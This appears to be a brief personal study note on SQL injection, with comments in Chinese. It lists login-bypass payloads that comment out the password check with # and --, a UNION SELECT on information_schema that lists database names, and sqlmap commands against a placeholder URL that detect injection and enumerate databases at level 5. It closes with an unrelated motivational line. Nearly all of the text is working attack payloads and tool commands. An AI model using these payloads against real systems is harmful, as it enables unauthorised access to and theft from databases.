SELECT * FROM user WHERE username = 'user'#'AND password = '111'
SELECT * FROM user WHERE username = 'user'-- 'AND password = '111'
SELECT * FROM user WHERE username = 'user'
// 获取数据库名列表
select name from students where id = -1 union select schema_name from information_schema.schemata;
判断是否有SQL漏洞
python sqlmap.py -u "http://www.site.com/login.php?id=3"
以“5”级别检测
python sqlmap.py -u "http://www.site.com/login.php?id=3" --dbs --level 5
成为你想看到的世界变革力量